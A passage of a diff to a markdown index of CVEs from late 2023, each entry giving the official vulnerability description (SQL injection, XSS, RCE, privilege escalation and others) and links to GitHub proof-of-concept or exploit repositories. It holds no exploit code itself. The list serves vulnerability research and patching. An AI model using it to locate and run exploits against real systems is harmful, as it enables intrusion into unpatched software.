+Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and EnableNodeCliInspectArguments, and thus r3ggi/electroniz3r can be used to perform an attack. + + +- [louiselalanne/CVE-2023-49314](https://github.com/louiselalanne/CVE-2023-49314) + +### CVE-2023-49339 (2024-02-13) + +Ellucian Banner 9.17 allows Insecure Direct Object Reference (IDOR) via a modified bannerId to the /StudentSelfService/ssb/studentCard/retrieveData endpoint. + + +- [3zizme/CVE-2023-49339](https://github.com/3zizme/CVE-2023-49339) + +### CVE-2023-49438 (2023-12-26) + +An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes. + + +- [brandon-t-elliott/CVE-2023-49438](https://github.com/brandon-t-elliott/CVE-2023-49438) + +### CVE-2023-49453 (2024-03-12) + +Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php. + + +- [nitipoom-jar/CVE-2023-49453](https://github.com/nitipoom-jar/CVE-2023-49453) + +### CVE-2023-49471 (2024-01-10) + +Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code. + + +- [zunak/CVE-2023-49471](https://github.com/zunak/CVE-2023-49471) + +### CVE-2023-49496 +- [HuangYanQwQ/CVE-2023-49496](https://github.com/HuangYanQwQ/CVE-2023-49496) + +### CVE-2023-49539 (2024-03-01) + +Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/category. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the category parameter. + + +- [geraldoalcantara/CVE-2023-49539](https://github.com/geraldoalcantara/CVE-2023-49539) + +### CVE-2023-49540 (2024-03-01) + +Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/history. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the history parameter. + + +- [geraldoalcantara/CVE-2023-49540](https://github.com/geraldoalcantara/CVE-2023-49540) + +### CVE-2023-49543 (2024-03-01) + +Incorrect access control in Book Store Management System v1 allows attackers to access unauthorized pages and execute administrative functions without authenticating. + + +- [geraldoalcantara/CVE-2023-49543](https://github.com/geraldoalcantara/CVE-2023-49543) + +### CVE-2023-49544 (2024-03-01) + +A local file inclusion (LFI) in Customer Support System v1 allows attackers to include internal PHP files and gain unauthorized acces via manipulation of the page= parameter at /customer_support/index.php. + + +- [geraldoalcantara/CVE-2023-49544](https://github.com/geraldoalcantara/CVE-2023-49544) + +### CVE-2023-49545 (2024-03-01) + +A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49545](https://github.com/geraldoalcantara/CVE-2023-49545) + +### CVE-2023-49546 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the email parameter at /customer_support/ajax.php. + + +- [geraldoalcantara/CVE-2023-49546](https://github.com/geraldoalcantara/CVE-2023-49546) + +### CVE-2023-49547 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the username parameter at /customer_support/ajax.php?action=login. + + +- [geraldoalcantara/CVE-2023-49547](https://github.com/geraldoalcantara/CVE-2023-49547) + +### CVE-2023-49548 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the lastname parameter at /customer_support/ajax.php?action=save_user. + + +- [geraldoalcantara/CVE-2023-49548](https://github.com/geraldoalcantara/CVE-2023-49548) + +### CVE-2023-49606 (2024-05-01) + +A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability. + + +- [d0rb/CVE-2023-49606](https://github.com/d0rb/CVE-2023-49606) + +### CVE-2023-49950 (2024-02-03) + +The Jinja templating in Logpoint SIEM 6.10.0 through 7.x before 7.3.0 does not correctly sanitize log data being displayed when using a custom Jinja template in the Alert view. A remote attacker can craft a cross-site scripting (XSS) payload and send it to any system or device that sends logs to the SIEM. If an alert is created, the payload will execute upon the alert data being viewed with that template, which can lead to sensitive data disclosure. + + +- [shrikeinfosec/cve-2023-49950](https://github.com/shrikeinfosec/cve-2023-49950) + +### CVE-2023-49954 (2023-12-25) + +The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address. + + +- [CVE-2023-49954/CVE-2023-49954.github.io](https://github.com/CVE-2023-49954/CVE-2023-49954.github.io) + +### CVE-2023-49964 (2023-12-11) + +An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873. + + +- [mbadanoiu/CVE-2023-49964](https://github.com/mbadanoiu/CVE-2023-49964) + +### CVE-2023-49965 (2024-04-05) + +SpaceX Starlink Wi-Fi router Gen 2 before 2023.48.0 allows XSS via the ssid and password parameters on the Setup Page. + + +- [yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS](https://github.com/yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS) + +### CVE-2023-49968 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/manage_department.php. + + +- [geraldoalcantara/CVE-2023-49968](https://github.com/geraldoalcantara/CVE-2023-49968) + +### CVE-2023-49969 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/index.php?page=edit_customer. + + +- [geraldoalcantara/CVE-2023-49969](https://github.com/geraldoalcantara/CVE-2023-49969) + +### CVE-2023-49970 (2024-03-04) + +Customer Support System v1 was discovered to contain a SQL injection vulnerability via the subject parameter at /customer_support/ajax.php?action=save_ticket. + + +- [geraldoalcantara/CVE-2023-49970](https://github.com/geraldoalcantara/CVE-2023-49970) + +### CVE-2023-49971 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter at /customer_support/index.php?page=customer_list. + + +- [geraldoalcantara/CVE-2023-49971](https://github.com/geraldoalcantara/CVE-2023-49971) + +### CVE-2023-49973 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter at /customer_support/index.php?page=customer_list. + + +- [geraldoalcantara/CVE-2023-49973](https://github.com/geraldoalcantara/CVE-2023-49973) + +### CVE-2023-49974 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contact parameter at /customer_support/index.php?page=customer_list. + + +- [geraldoalcantara/CVE-2023-49974](https://github.com/geraldoalcantara/CVE-2023-49974) + +### CVE-2023-49976 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the subject parameter at /customer_support/index.php?page=new_ticket. + + +- [geraldoalcantara/CVE-2023-49976](https://github.com/geraldoalcantara/CVE-2023-49976) + +### CVE-2023-49977 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the address parameter at /customer_support/index.php?page=new_customer. + + +- [geraldoalcantara/CVE-2023-49977](https://github.com/geraldoalcantara/CVE-2023-49977) + +### CVE-2023-49978 (2024-03-06) + +Incorrect access control in Customer Support System v1 allows non-administrator users to access administrative pages and execute actions reserved for administrators. + + +- [geraldoalcantara/CVE-2023-49978](https://github.com/geraldoalcantara/CVE-2023-49978) + +### CVE-2023-49979 (2024-03-06) + +A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49979](https://github.com/geraldoalcantara/CVE-2023-49979) + +### CVE-2023-49980 (2024-03-06) + +A directory listing vulnerability in Best Student Result Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49980](https://github.com/geraldoalcantara/CVE-2023-49980) + +### CVE-2023-49981 (2024-03-06) + +A directory listing vulnerability in School Fees Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization. + + +- [geraldoalcantara/CVE-2023-49981](https://github.com/geraldoalcantara/CVE-2023-49981) + +### CVE-2023-49982 (2024-03-06) + +Broken access control in the component /admin/management/users of School Fees Management System v1.0 allows attackers to escalate privileges and perform Administrative actions, including adding and deleting user accounts. + + +- [geraldoalcantara/CVE-2023-49982](https://github.com/geraldoalcantara/CVE-2023-49982) + +### CVE-2023-49983 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [geraldoalcantara/CVE-2023-49983](https://github.com/geraldoalcantara/CVE-2023-49983) + +### CVE-2023-49984 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in the component /management/settings of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [geraldoalcantara/CVE-2023-49984](https://github.com/geraldoalcantara/CVE-2023-49984) + +### CVE-2023-49985 (2024-03-06) + +A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cname parameter. + + +- [geraldoalcantara/CVE-2023-49985](https://github.com/geraldoalcantara/CVE-2023-49985) + +### CVE-2023-49986 (2024-03-07) + +A cross-site scripting (XSS) vulnerability in the component /admin/parent of School Fees Management System 1.0 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [geraldoalcantara/CVE-2023-49986](https://github.com/geraldoalcantara/CVE-2023-49986) + +### CVE-2023-49987 (2024-03-07) + +A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter. + + +- [geraldoalcantara/CVE-2023-49987](https://github.com/geraldoalcantara/CVE-2023-49987) + +### CVE-2023-49988 (2024-03-07) + +Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the npss parameter at rooms.php. + + +- [geraldoalcantara/CVE-2023-49988](https://github.com/geraldoalcantara/CVE-2023-49988) + +### CVE-2023-49989 (2024-03-07) + +Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php. + + +- [geraldoalcantara/CVE-2023-49989](https://github.com/geraldoalcantara/CVE-2023-49989) + +### CVE-2023-50029 (2024-06-24) + +PHP Injection vulnerability in the module "M4 PDF Extensions" (m4pdf) up to version 3.3.2 from PrestaAddons for PrestaShop allows attackers to run arbitrary code via the M4PDF::saveTemplate() method. + + +- [absholi7ly/PHP-Injection-in-M4-PDF-Extensions](https://github.com/absholi7ly/PHP-Injection-in-M4-PDF-Extensions) + +### CVE-2023-50070 (2023-12-29) + +Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject. + + +- [geraldoalcantara/CVE-2023-50070](https://github.com/geraldoalcantara/CVE-2023-50070) + +### CVE-2023-50071 (2023-12-29) + +Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name. + + +- [geraldoalcantara/CVE-2023-50071](https://github.com/geraldoalcantara/CVE-2023-50071) + +### CVE-2023-50072 (2024-01-13) + +A Stored Cross-Site Scripting (XSS) vulnerability exists in OpenKM version 7.1.40 (dbb6e88) With Professional Extension that allows an authenticated user to upload a note on a file which acts as a stored XSS payload. Any user who opens the note of a document file will trigger the XSS. + + +- [ahrixia/CVE-2023-50072](https://github.com/ahrixia/CVE-2023-50072) + +### CVE-2023-50094 (2024-01-01) + +reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output. + + +- [Zierax/CVE-2023-50094_POC](https://github.com/Zierax/CVE-2023-50094_POC) + +### CVE-2023-50131 +- [sajaljat/CVE-2023-50131](https://github.com/sajaljat/CVE-2023-50131) + +### CVE-2023-50132 +- [sajaljat/CVE-2023-50132](https://github.com/sajaljat/CVE-2023-50132) + +### CVE-2023-50164 (2023-12-07) + +An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.\nUsers are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.\n + + +- [minhbao15677/CVE-2023-50164](https://github.com/minhbao15677/CVE-2023-50164) +- [jakabakos/CVE-2023-50164-Apache-Struts-RCE](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE) +- [bcdannyboy/CVE-2023-50164](https://github.com/bcdannyboy/CVE-2023-50164) +- [dwisiswant0/cve-2023-50164-poc](https://github.com/dwisiswant0/cve-2023-50164-poc) +- [helsecert/cve-2023-50164](https://github.com/helsecert/cve-2023-50164) +- [Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE](https://github.com/Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE) +- [Trackflaw/CVE-2023-50164-ApacheStruts2-Docker](https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker) +- [miles3719/cve-2023-50164](https://github.com/miles3719/cve-2023-50164) +- [aaronm-sysdig/cve-2023-50164](https://github.com/aaronm-sysdig/cve-2023-50164) +- [snyk-labs/CVE-2023-50164-POC](https://github.com/snyk-labs/CVE-2023-50164-POC) +- [sunnyvale-it/CVE-2023-50164-PoC](https://github.com/sunnyvale-it/CVE-2023-50164-PoC) +- [AsfandAliMemon25/CVE-2023-50164Analysis-](https://github.com/AsfandAliMemon25/CVE-2023-50164Analysis-) +- [NikitaPark/CVE-2023-50164-PoC](https://github.com/NikitaPark/CVE-2023-50164-PoC) +- [Trackflaw/CVE-2024-10924-Wordpress-Docker](https://github.com/Trackflaw/CVE-2024-10924-Wordpress-Docker) + +### CVE-2023-50226 (2024-05-03) + +Parallels Desktop Updater Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Updater service. By creating a symbolic link, an attacker can abuse the service to move arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.\n. Was ZDI-CAN-21227. + + +- [kn32/parallels-file-move-privesc](https://github.com/kn32/parallels-file-move-privesc) + +### CVE-2023-50245 (2023-12-11) + +OpenEXR-viewer is a viewer for OpenEXR files with detailed metadata probing. Versions prior to 0.6.1 have a memory overflow vulnerability. This issue is fixed in version 0.6.1. + + +- [200101WhoAmI/CVE-2023-50245](https://github.com/200101WhoAmI/CVE-2023-50245) + +### CVE-2023-50254 (2023-12-22) + +Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. + + +- [febinrev/deepin-linux_reader_RCE-exploit](https://github.com/febinrev/deepin-linux_reader_RCE-exploit) + +### CVE-2023-50386 (2024-02-09) + +Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.\n\nIn the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API.\nWhen backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups).\nIf the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted.\n\nWhen Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries.\nUsers are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.\nIn these versions, the following protections have been added:\n\n * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader.\n * The Backup API restricts saving backups to directories that are used in the ClassLoader.\n\n + + +- [vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC](https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC) + +### CVE-2023-50387 (2024-02-14) + +Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records. + + +- [knqyf263/CVE-2023-50387](https://github.com/knqyf263/CVE-2023-50387) +- [Meirelez/SSR-DNSSEC](https://github.com/Meirelez/SSR-DNSSEC) + +### CVE-2023-50465 (2023-12-11) + +A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user. + + +- [Ev3rR3d/CVE-2023-50465](https://github.com/Ev3rR3d/CVE-2023-50465) + +### CVE-2023-50564 (2023-12-14) + +An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file. + + +- [Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC](https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC) +- [ipuig/CVE-2023-50564](https://github.com/ipuig/CVE-2023-50564) +- [rwexecute/CVE-2023-50564](https://github.com/rwexecute/CVE-2023-50564) +- [thefizzyfish/CVE-2023-50564-pluck](https://github.com/thefizzyfish/CVE-2023-50564-pluck) +- [Mrterrestrial/CVE-2023-50564](https://github.com/Mrterrestrial/CVE-2023-50564) +- [0xDTC/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564](https://github.com/0xDTC/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564) + +### CVE-2023-50596 +- [chandraprarikraj/CVE-2023-50596](https://github.com/chandraprarikraj/CVE-2023-50596) + +### CVE-2023-50643 (2024-01-09) + +An issue in Evernote Evernote for MacOS v.10.68.2 allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components. + + +- [giovannipajeu1/CVE-2023-50643](https://github.com/giovannipajeu1/CVE-2023-50643) + +### CVE-2023-50685 (2024-05-02) + +An issue in Hipcam Cameras RealServer v.1.0 allows a remote attacker to cause a denial of service via a crafted script to the client_port parameter. + + +- [MaximilianJungblut/Hipcam-RTSP-Format-Validation-Vulnerability](https://github.com/MaximilianJungblut/Hipcam-RTSP-Format-Validation-Vulnerability) + +### CVE-2023-50868 (2024-02-14) + +The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations. + + +- [Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack](https://github.com/Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack) + +### CVE-2023-50917 (2023-12-15) + +MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. + + +- [Chocapikk/CVE-2023-50917](https://github.com/Chocapikk/CVE-2023-50917) + +### CVE-2023-51000 +- [Team-Byerus/CVE-2023-51000](https://github.com/Team-Byerus/CVE-2023-51000) + +### CVE-2023-51073 (2024-01-11) + +An issue in Buffalo LS210D v.1.78-0.03 allows a remote attacker to execute arbitrary code via the Firmware Update Script at /etc/init.d/update_notifications.sh. + + +- [christopher-pace/CVE-2023-51073](https://github.com/christopher-pace/CVE-2023-51073) + +### CVE-2023-51119 +- [OscarAkaElvis/CVE-2023-51119](https://github.com/OscarAkaElvis/CVE-2023-51119) + +### CVE-2023-51126 (2024-01-10) + +Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter. + + +- [risuxx/CVE-2023-51126](https://github.com/risuxx/CVE-2023-51126) + +### CVE-2023-51127 (2024-01-10) + +FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file. + + +- [risuxx/CVE-2023-51127](https://github.com/risuxx/CVE-2023-51127) + +### CVE-2023-51214 +- [chandraprarikraj/CVE-2023-51214](https://github.com/chandraprarikraj/CVE-2023-51214) + +### CVE-2023-51281 (2024-03-07) + +Cross Site Scripting vulnerability in Customer Support System v.1.0 allows a remote attacker to escalate privileges via a crafted script firstname, "lastname", "middlename", "contact" and address parameters. + + +- [geraldoalcantara/CVE-2023-51281](https://github.com/geraldoalcantara/CVE-2023-51281) + +### CVE-2023-51385 (2023-12-18) + +In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name. + + +- [vin01/poc-proxycommand-vulnerable](https://github.com/vin01/poc-proxycommand-vulnerable) +- [FeatherStark/CVE-2023-51385](https://github.com/FeatherStark/CVE-2023-51385) +- [watarium/poc-cve-2023-51385](https://github.com/watarium/poc-cve-2023-51385) +- [Le1a/CVE-2023-51385](https://github.com/Le1a/CVE-2023-51385) +- [LtmThink/CVE-2023-51385_test](https://github.com/LtmThink/CVE-2023-51385_test) +- [WLaoDuo/CVE-2023-51385_poc-test](https://github.com/WLaoDuo/CVE-2023-51385_poc-test) +- [power1314520/CVE-2023-51385_test](https://github.com/power1314520/CVE-2023-51385_test) +- [WOOOOONG/CVE-2023-51385](https://github.com/WOOOOONG/CVE-2023-51385) +- [uccu99/CVE-2023-51385](https://github.com/uccu99/CVE-2023-51385) +- [julienbrs/exploit-CVE-2023-51385](https://github.com/julienbrs/exploit-CVE-2023-51385) +- [julienbrs/malicious-exploit-CVE-2023-51385](https://github.com/julienbrs/malicious-exploit-CVE-2023-51385) +- [Sonicrrrr/CVE-2023-51385](https://github.com/Sonicrrrr/CVE-2023-51385) +- [farliy-hacker/CVE-2023-51385](https://github.com/farliy-hacker/CVE-2023-51385) +- [farliy-hacker/CVE-2023-51385-save](https://github.com/farliy-hacker/CVE-2023-51385-save) +- [2048JiaLi/CVE-2023-51385](https://github.com/2048JiaLi/CVE-2023-51385) +- [thinkliving2020/CVE-2023-51385-](https://github.com/thinkliving2020/CVE-2023-51385-) +- [c0deur/CVE-2023-51385](https://github.com/c0deur/CVE-2023-51385) +- [endasugrue/CVE-2023-51385_poc](https://github.com/endasugrue/CVE-2023-51385_poc) +- [MiningBot-eth/CVE-2023-51385-exploit](https://github.com/MiningBot-eth/CVE-2023-51385-exploit) +- [Featherw1t/CVE-2023-51385_test](https://github.com/Featherw1t/CVE-2023-51385_test) + +### CVE-2023-51409 (2024-04-12) + +Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 1.9.98.\n\n + + +- [RandomRobbieBF/CVE-2023-51409](https://github.com/RandomRobbieBF/CVE-2023-51409) + +### CVE-2023-51448 (2023-12-22) + +Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `‘managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `‘/cacti/managers.php’` with an SQLi payload in the `‘selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist. + + +- [jakabakos/CVE-2023-51448-cacti-sqli-poc](https://github.com/jakabakos/CVE-2023-51448-cacti-sqli-poc) + +### CVE-2023-51467 (2023-12-26) + +The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code\n\n + + +- [JaneMandy/CVE-2023-51467](https://github.com/JaneMandy/CVE-2023-51467) +- [Chocapikk/CVE-2023-51467](https://github.com/Chocapikk/CVE-2023-51467) +- [K3ysTr0K3R/CVE-2023-51467-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-51467-EXPLOIT) +- [jakabakos/Apache-OFBiz-Authentication-Bypass](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass) +- [Subha-BOO7/Exploit_CVE-2023-51467](https://github.com/Subha-BOO7/Exploit_CVE-2023-51467) +- [JaneMandy/CVE-2023-51467-Exploit](https://github.com/JaneMandy/CVE-2023-51467-Exploit) +- [vulncheck-oss/cve-2023-51467](https://github.com/vulncheck-oss/cve-2023-51467) +- [2ptr/BadBizness-CVE-2023-51467](https://github.com/2ptr/BadBizness-CVE-2023-51467) +- [AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-](https://github.com/AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-) + +### CVE-2023-51504 (2024-02-05) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.\n\n + + +- [Sybelle03/CVE-2023-51504](https://github.com/Sybelle03/CVE-2023-51504) + +### CVE-2023-51518 (2024-02-27) + +Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data.\nGiven a deserialisation gadjet, this could be leveraged as part of an exploit chain that could result in privilege escalation.\nNote that by default JMX endpoint is only bound locally.\n\nWe recommend users to:\n - Upgrade to a non-vulnerable Apache James version\n\n - Run Apache James isolated from other processes (docker - dedicated virtual machine)\n - If possible turn off JMX\n\n + + +- [mbadanoiu/CVE-2023-51518](https://github.com/mbadanoiu/CVE-2023-51518) + +### CVE-2023-51764 (2023-12-24) + +Postfix through 3.8.5 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required, such as the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9. + + +- [duy-31/CVE-2023-51764](https://github.com/duy-31/CVE-2023-51764) +- [eeenvik1/CVE-2023-51764](https://github.com/eeenvik1/CVE-2023-51764) +- [d4op/CVE-2023-51764-POC](https://github.com/d4op/CVE-2023-51764-POC) +- [Double-q1015/CVE-2023-51764](https://github.com/Double-q1015/CVE-2023-51764) + +### CVE-2023-51800 (2024-02-29) + +Cross Site Scripting (XSS) vulnerability in School Fees Management System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the main_settings component in the phone, address, bank, acc_name, acc_number parameters, new_class and cname parameter, add_new_parent function in the name email parameters, new_term function in the tname parameter, and the edit_student function in the name parameter. + + +- [geraldoalcantara/CVE-2023-51800](https://github.com/geraldoalcantara/CVE-2023-51800) + +### CVE-2023-51801 (2024-02-29) + +SQL Injection vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the id parameter in the student_form.php and the class_form.php pages. + + +- [geraldoalcantara/CVE-2023-51801](https://github.com/geraldoalcantara/CVE-2023-51801) + +### CVE-2023-51802 (2024-02-29) + +Cross Site Scripting (XSS) vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the page or class_month parameter in the /php-attendance/attendance_report component. + + +- [geraldoalcantara/CVE-2023-51802](https://github.com/geraldoalcantara/CVE-2023-51802) + +### CVE-2023-51810 (2024-01-16) + +SQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module. + + +- [Pastea/CVE-2023-51810](https://github.com/Pastea/CVE-2023-51810) + +### CVE-2023-52160 (2024-02-22) + +The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks. + + +- [Helica-core/eap_pwn](https://github.com/Helica-core/eap_pwn) + +### CVE-2023-52251 (2024-01-25) + +An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. + + +- [BobTheShoplifter/CVE-2023-52251-POC](https://github.com/BobTheShoplifter/CVE-2023-52251-POC) + +### CVE-2023-52268 (2024-11-12) + +The End-User Portal module before 1.0.65 for FreeScout sometimes allows 